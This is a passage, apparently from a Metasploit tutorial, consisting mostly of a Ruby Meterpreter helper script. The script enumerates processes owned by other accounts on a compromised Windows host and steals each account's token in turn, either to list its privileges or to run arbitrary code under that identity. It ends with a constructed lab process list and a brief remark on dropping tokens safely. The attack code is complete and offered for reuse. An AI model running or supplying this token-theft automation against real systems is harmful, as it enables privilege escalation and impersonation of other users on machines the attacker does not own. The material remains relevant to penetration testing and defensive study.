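  wanted = processes.select do |p|
    user = p['user'].to_s
    !user.empty? &&
      user.downcase != current_user.downcase &&
      !skip.include?(p['name'].to_s.downcase)
  end
  wanted.sort_by { |p| [p['name'].to_s.downcase == 'explorer.exe' ? 0 : 1, p['pid']] }
end

# One PID per distinct account, so each token is tried once.
def one_pid_per_user(candidates)
  candidates.each_with_object({}) { |p, acc| acc[p['user']] ||= p['pid'] }
end

# Steal each candidate token in turn, run the given block as that account
# (default: list enabled privileges), and always drop the token afterwards so
# a failure never leaves the session stuck impersonating someone else.
# Returns a Hash of user => result or error string.
def try_each_token(client, skip_names: [])
  me = client.sys.config.getuid
  targets = one_pid_per_user(
    token_candidates(client.sys.process.get_processes, me, skip_names: skip_names)
  )
  results = {}
  targets.each do |user, pid|
    begin
      stolen = client.sys.config.steal_token(pid)
      results[user] = block_given? ? yield(stolen) : client.sys.config.getprivs
    rescue StandardError => e
      results[user] = "steal_token(#{pid}) failed: #{e.message}"
    ensure
      client.sys.config.drop_token
    end
  end
  results
end

# Constructed sample, modelled on the ps output in the post with the added
# User column (the payload's user is made up), to exercise the helpers offline.
SAMPLE_PROCESSES = [
  { 'pid' => 268,  'name' => 'smss.exe',       'user' => 'NT AUTHORITY\\SYSTEM' },
  { 'pid' => 700,  'name' => 'svchost.exe',    'user' => 'NT AUTHORITY\\NETWORK SERVICE' },
  { 'pid' => 784,  'name' => 'svchost.exe',    'user' => 'NT AUTHORITY\\LOCAL SERVICE' },
  { 'pid' => 2164, 'name' => 'Explorer.EXE',   'user' => 'WIN2K3LAB01\\Administrator' },
  { 'pid' => 2228, 'name' => 'VMwareTray.exe', 'user' => 'WIN2K3LAB01\\Administrator' },
  { 'pid' => 2284, 'name' => 'meter_224.exe',  'user' => 'NT AUTHORITY\\SYSTEM' },
  { 'pid' => 3096, 'name' => 'taskmgr.exe',    'user' => 'WIN2K3LAB01\\Administrator' }
].freeze

if __FILE__ == $PROGRAM_NAME
  plan = one_pid_per_user(token_candidates(SAMPLE_PROCESSES, 'NT AUTHORITY\\SYSTEM',
                                           skip_names: ['meter_224.exe']))
  plan.each { |user, pid| puts "would steal_token #{pid} for #{user}" }
  # In a live session: try_each_token(client, skip_names: ['meter_224.exe'])
end
```

The ensure clause is the part worth copying: whatever the block does as the stolen identity, the session is back to its original token before the next iteration, which is the same discipline as the drop_token on line 41 of the manual walkthrough.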